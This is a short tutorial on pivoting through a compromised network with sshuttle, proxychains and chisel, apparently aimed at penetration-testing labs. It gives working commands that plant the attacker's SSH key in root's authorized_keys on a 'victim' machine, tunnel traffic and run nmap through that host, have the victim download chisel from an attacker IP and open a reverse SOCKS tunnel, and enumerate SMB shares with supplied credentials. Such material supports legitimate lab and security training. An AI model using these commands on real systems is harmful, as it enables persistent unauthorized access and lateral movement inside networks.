In this tutorial you will learn how to setup sshutle and proxychains to pivot through a network.
SSHUTTLE
What is sshuttle
sshuttle allows you to create a VPN connection from your machine to any remote server that you can connect to via ssh, as long as that server has a sufficiently new Python installation. To work, you must have root access on the local machine, but you can have a normal account on the server.
How to make it work
- Install sshuttle with this command :
sudo apt install sshuttle - On your local machine, generate an ssh key with this command :
ssh-keygen -t rsa - On the victim machine, put your public sshkey in the authorized_key file with this command:
echo "YOUR_PUBLIC_SSH_KEY" >> /root/.ssh/authorized_keys - On your local machine connect to the victim machine with sshuttle :
sshuttle -vr root@VICTIM_MACHINE_IP SUBNET/24 --ssh-cmd "ssh -i ./PATH_TO_YOUR_PRIVATE_KEY"Proxychains
What is Proxychains
ProxyChains is a tool that redirects TCP connections made by applications, through various proxies like SOCKS4, SOCKS5, or HTTP. It is an open-source project for GNU/Linux systems. ProxyChains can string multiple proxies together to make it harder to identify the original IP address. You will need proxychains to use nmap since it do not work it sshuttle
-
In the /etc/proxychains4.conf file Choose the port you want proxychains to run on
- Run this ssh command to enable proxychains:
ssh -i PRIVATE_SSH_KEY -D localhost:9000 -f -N root@VICTIM_IP -p SSH_PORT" - You can now use proxychains on whatever tools you want, here is an example of how to use it with nmap.
proxychains4 nmap IP_TO_SCANChisel
cmd> curl http://10.10.14.8/chisel_1.7.6_windows_amd64 -o chisel.exe
cmd> .\chisel.exe client 10.10.14.8:8080 R:1080:socks
On kali:
chisel server -p 8080 —reverse
In the browser foxy proxy: 127.0.0.1:80
ex smb:
sudo proxychains smbmap -H <IP> -d '<DOMAIN>' -u '<UNERNAME>' -p '<PASSWORD>'